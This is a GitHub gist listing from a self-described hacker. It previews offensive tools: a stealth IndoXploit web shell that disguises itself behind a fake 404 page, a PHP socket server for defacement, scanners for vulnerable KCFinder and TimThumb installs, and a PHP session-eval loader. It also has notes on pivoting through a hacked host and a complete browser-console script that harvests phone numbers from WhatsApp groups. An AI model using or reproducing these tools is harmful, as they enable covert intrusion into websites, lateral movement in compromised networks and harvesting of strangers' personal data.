Skip to content

Instantly share code, notes, and snippets.

View ttycelery's full-sized avatar
🧀
eating cheese

Faiz Jazadi ttycelery

🧀
eating cheese
426 followers · 249 following
View GitHub Profile
@ttycelery
ttycelery / idx_v3_modified.php
Last active June 4, 2023 15:31
IndoXploit Shell v3 (Stealth Version)
<?php
/*
* # IndoXploit v3 Web Shell (Stealth Version)
* # What was involved?
* - Uses dynamic 404 page from the server to make the web shell looks like it was deleted
* - Login method is by using GET parameters, (example: 'http://example.com/idx_s.php?passwd=password_saia_kaka')
* # Important Bookmark
* - Password configuration at line 27
* - login_shell() function at line 40-52
* - Login validation at line 57-64
@ttycelery
ttycelery / socket_php.php
Created November 18, 2017 07:44
PHP Socket Server for Deface
<?php
/*
- Socket Server PHP
| Author: P4kL0nc4t / Obsidian Cyber Team
| Date: 28 October 2017
| Note: Editing author will not make you the real coder!
*/
set_time_limit (0);
if(!empty($_GET['port']) && is_numeric($_GET['port'])) {
$port = $_GET['port'];
@ttycelery
ttycelery / fec.py
Last active December 5, 2017 06:58
FEC KCFinder
#!/usr/bin/python
path = "panel/kcfinder/upload.php"
indicator = "Unknown" # don't change
import requests
import sys
print """\
+-+-+-+ File Existency Checker (KCFinder)
|F|E|C| Simple Version
+-+-+-+ https://github.com/p4kl0nc4t
"""
@ttycelery
ttycelery / timthumb.php
Created January 7, 2018 16:30
WordPress TimThumb Finder
<html>
<title>WordPress TimThumb Finder</title>
<?php
/*
* WordPress TimThumb Finder
* Author : P4kL0nc4t
* Date : 07/01/2018
* Adapted from Wordpress TimThumb Finder v1.0 by Rafay Baloch (Python) -> https://dl.packetstormsecurity.net/UNIX/scanners/wptimthumb-scanner.txt
*/
if(isset($_REQUEST['url'])) {
@ttycelery
ttycelery / sessi0n.py
Last active May 16, 2018 15:30
sessi0n: simple tool to store PHP script as session variable and evaluate it.
#!/usr/bin/python2
# - sessi0n
# | Date: 18/02/2018
# | Author: P4kL0nc4t
# | Description: simple tool to store PHP script as session variable and evaluate it.
print('''\
_ ___
___ ___ ___ ___ (_) _ \___ | sessi0n: session based PHP script
(_-</ -_|_-<(_-</ / // / _ \\ | { v1.1 }
@ttycelery
ttycelery / pivoting.md
Last active January 19, 2023 10:19
KULGRAM Surabaya Hacker Link tentang Pivoting

Pivoting

Apa itu Pivoting?

Pivoting merupakan metode yang menggunakan "instance" yang biasa disebut "pivot host" atau "foothold" agar bisa "berpindah" dari suatu tempat ke tempat di dalam

jaringan yg sudah dihek. Simplenya, kita pakai asumsi dibawah untuk pivoting melakukan pivoting dengan OpenSSH.

  • Attacker punya "akses shell" ke sebuah komputer (dalam hal ini, osnya linux, nanti sesuain aja)
  • Komputer tadi selanjutnya disebut "Pivot host"
  • Di komputer itu sudah terinstall client OpenSSH dengan setting GatewayPorts menyala (di /etc/ssh/sshd_config) untuk memungkinkan reverse ssh port forwarding (baca: https://blog.devolutions.net/2017/3/what-is-reverse-ssh-port-forwarding)
  • Di komputer attacker, server OpenSSH berjalan di port 22
  • Port 22 di komputer attacker sudah diforward atau diekspose ke internet (sehingga bisa diakses oleh pivot host)
@ttycelery
ttycelery / revip.py
Created March 10, 2018 07:38
RevIP: Simple Reverse IP Lookup Tool
#!/usr/bin/python
# - RevIP
# | Date: 10/03/2018
# | Author: P4kL0nc4t
# | Description: simple reverse IP lookup tool that combines multiple API to achieve effective result.
import requests
import sys
requests.packages.urllib3.disable_warnings()
from socket import gethostbyname
@ttycelery
ttycelery / google-dorker.py
Created March 31, 2018 09:16
GDS: simple Google dorker script
import re
import requests
from bs4 import BeautifulSoup
import sys
import webbrowser
global_cookies = None
def the_end():
print("\r|! end: successfully dumped {} urls from Google search query '{}' to file '{}' (end_page={})".format(len(cached_urls), sys.argv[1], sys.argv[3], pagenm))
@ttycelery
ttycelery / whatsapp.js
Last active July 25, 2023 15:24
WhatsApp Group Phone Number Grabber: grab all (unsaved) phone numbers in WhatsApp group
/*
Paste the following minified script to browser console (with WhatsApp Web open)
---------------
var phone_list=[];function get_list(e){var t=document.getElementsByClassName("O90ur")[0].innerText;t=t.split(", ");for(var l=0;l<t.length;l++)num=t[l].replace(/[^0-9]/g,""),"6"==num.charAt(0)&&(phone_list.includes(num)||phone_list.push(num));e&&alert(phone_list.join("\n"))}function doc_keyUp(e){e.ctrlKey&&57==e.keyCode?get_list(!0):e.ctrlKey&&56==e.keyCode?(get_list(!1),document.title="List successfully captured!"):e.ctrlKey&&55==e.keyCode?(phone_list=[],document.title="List successfully cleared!"):e.ctrlKey&&54==e.keyCode&&(document.title="Current list length: "+phone_list.length)}document.addEventListener("keyup",doc_keyUp,!1);
---------------
After entering above text, you can use these hotkeys:
- CTRL+9: capture current group chat phone numbers (unsaved numbers) and display an alert()
- CTRL+8: capture current group chat phone numbers and show notification in page title
- CTRL+7: clear captured phone_number
@ttycelery
ttycelery / gen_cred.py
Created April 7, 2018 04:49
spam-phising: an example of phising site spammer script
import random
class credential_generator:
def __init__(self, username_list, password_list, email_list=['gmail.com', 'yahoo.com', 'yandex.com', 'protonmail.com']):
self.u_list = open(username_list, "r").readlines()
self.p_list = open(password_list, "r").readlines()
self.u_listf = []
self.p_listf = []
self.e_listf = email_list
for username in self.u_list:
self.u_listf.append(username.rstrip())